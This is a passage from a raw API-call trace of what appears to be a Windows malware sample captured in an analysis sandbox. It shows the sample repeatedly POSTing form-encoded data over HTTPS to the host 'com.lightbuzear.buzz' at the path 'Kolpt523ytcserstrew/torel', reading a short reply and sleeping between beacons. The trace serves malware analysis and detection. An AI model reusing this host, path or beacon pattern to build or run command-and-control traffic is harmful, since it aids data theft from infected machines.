(HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fa90 [0195.440] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f808 | out: hHeap=0x4780000) returned 1 [0195.440] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0195.440] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa90 | out: hHeap=0x4780000) returned 1 [0195.440] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481f8c8 [0195.440] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815180 [0195.440] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815180 | out: hHeap=0x4780000) returned 1 [0195.440] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0195.440] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0195.440] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0195.440] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0195.440] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0195.441] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0195.441] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0195.441] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0195.441] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0195.441] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0195.441] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0195.441] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f820 [0195.441] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0195.441] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fa90 [0195.441] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f820 | out: hHeap=0x4780000) returned 1 [0195.441] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0195.441] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa90 | out: hHeap=0x4780000) returned 1 [0195.441] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4815180 [0195.441] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0195.441] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0195.441] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815180 | out: hHeap=0x4780000) returned 1 [0195.441] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815180 [0195.441] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0195.441] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48154a0 [0195.441] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0195.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0195.442] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0195.442] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0195.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48154a0 | out: hHeap=0x4780000) returned 1 [0195.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0195.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5f0 [0195.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0195.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0195.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0195.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0195.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0195.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6d0 [0195.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0195.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f808 [0195.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0195.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f868 [0195.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f808 | out: hHeap=0x4780000) returned 1 [0195.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0195.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f868 | out: hHeap=0x4780000) returned 1 [0195.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4815428 [0195.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0195.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0195.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815428 | out: hHeap=0x4780000) returned 1 [0195.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815310 [0195.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb8d0 [0195.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815248 [0195.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0195.444] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0195.444] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0195.444] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0196.485] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815248 | out: hHeap=0x4780000) returned 1 [0196.485] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0196.485] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0196.486] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0196.486] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5c0 [0196.486] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0196.486] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0196.486] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0196.486] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0196.486] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0196.486] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0196.486] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6d0 [0196.486] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0196.486] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f988 [0196.486] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0196.487] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fa90 [0196.487] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f988 | out: hHeap=0x4780000) returned 1 [0196.487] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0196.487] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa90 | out: hHeap=0x4780000) returned 1 [0196.487] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48153b0 [0196.487] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0196.487] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0196.487] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48153b0 | out: hHeap=0x4780000) returned 1 [0196.487] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815360 [0196.487] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe80 [0196.487] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815400 [0196.488] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0196.488] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0196.488] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0196.488] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0196.489] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815400 | out: hHeap=0x4780000) returned 1 [0196.489] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0196.489] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0196.489] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce610 [0196.489] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0196.489] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5f0 [0196.489] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0196.489] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0196.489] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0196.489] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0196.489] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0196.489] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f820 [0196.489] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0196.490] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f940 [0196.490] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f820 | out: hHeap=0x4780000) returned 1 [0196.490] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0196.490] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f940 | out: hHeap=0x4780000) returned 1 [0196.490] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4815220 [0196.490] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0196.490] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0196.490] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815220 | out: hHeap=0x4780000) returned 1 [0196.490] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815450 [0196.490] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0196.490] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48153d8 [0196.490] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0196.491] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0196.491] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0196.491] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0196.491] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48153d8 | out: hHeap=0x4780000) returned 1 [0196.491] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0196.491] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0196.491] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0196.491] FreeLibrary (hLibModule=0x71570000) returned 1 [0196.492] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0196.492] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0196.492] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814ed8 | out: hHeap=0x4780000) returned 1 [0196.492] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815158 | out: hHeap=0x4780000) returned 1 [0196.492] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814e60 | out: hHeap=0x4780000) returned 1 [0196.493] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815040 | out: hHeap=0x4780000) returned 1 [0196.516] Sleep (dwMilliseconds=0x2710) [0196.531] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0196.531] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0196.531] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0196.531] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0196.531] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0196.531] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5f0 [0196.532] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0196.532] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0196.532] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0196.532] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fad8 [0196.532] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0196.532] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f928 [0196.532] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fad8 | out: hHeap=0x4780000) returned 1 [0196.532] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0196.532] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f928 | out: hHeap=0x4780000) returned 1 [0196.532] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481f988 [0196.532] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814e60 [0196.532] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814e60 | out: hHeap=0x4780000) returned 1 [0196.532] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0196.532] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815040 [0196.533] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0196.533] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0196.533] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0196.533] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0196.533] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6b0 [0196.533] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0196.533] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0196.533] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0196.533] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce640 [0196.533] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0196.533] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fa18 [0196.533] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0196.533] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fa90 [0196.533] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa18 | out: hHeap=0x4780000) returned 1 [0196.533] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0196.533] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa90 | out: hHeap=0x4780000) returned 1 [0196.533] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4815158 [0196.533] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0196.533] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd30 [0196.534] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815158 | out: hHeap=0x4780000) returned 1 [0196.534] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815158 [0196.534] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0196.534] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814ed8 [0196.535] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0196.535] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0196.535] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0196.535] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0196.536] FreeLibrary (hLibModule=0x71780000) returned 1 [0196.536] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814ed8 | out: hHeap=0x4780000) returned 1 [0196.536] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0196.536] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814e60 [0196.536] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0196.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0196.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0196.537] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0196.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5c0 [0196.537] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0196.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0196.537] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0196.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0196.537] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0196.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f9a0 [0196.537] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0196.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f820 [0196.537] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f9a0 | out: hHeap=0x4780000) returned 1 [0196.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0196.537] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f820 | out: hHeap=0x4780000) returned 1 [0196.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481f820 [0196.537] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814ed8 [0196.537] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814ed8 | out: hHeap=0x4780000) returned 1 [0196.538] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0196.538] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814ed8 [0196.538] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0196.538] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815478 [0196.538] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0196.538] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0196.538] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0196.538] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0196.538] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0196.538] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6b0 [0196.538] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0196.538] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0196.538] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0196.538] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f970 [0196.538] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0196.538] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f8b0 [0196.538] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f970 | out: hHeap=0x4780000) returned 1 [0196.538] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0196.538] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f8b0 | out: hHeap=0x4780000) returned 1 [0196.538] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481f868 [0196.538] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48154a0 [0196.539] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48154a0 | out: hHeap=0x4780000) returned 1 [0196.539] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0196.539] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0196.539] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0196.539] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0196.539] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0196.539] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce680 [0196.539] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0196.539] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5c0 [0196.540] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0196.540] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0196.540] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0196.540] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fa18 [0196.540] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0196.540] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f940 [0196.540] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa18 | out: hHeap=0x4780000) returned 1 [0196.540] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0196.540] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f940 | out: hHeap=0x4780000) returned 1 [0196.540] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48153d8 [0196.540] HeapFree (in: hHeap=0x4780000, 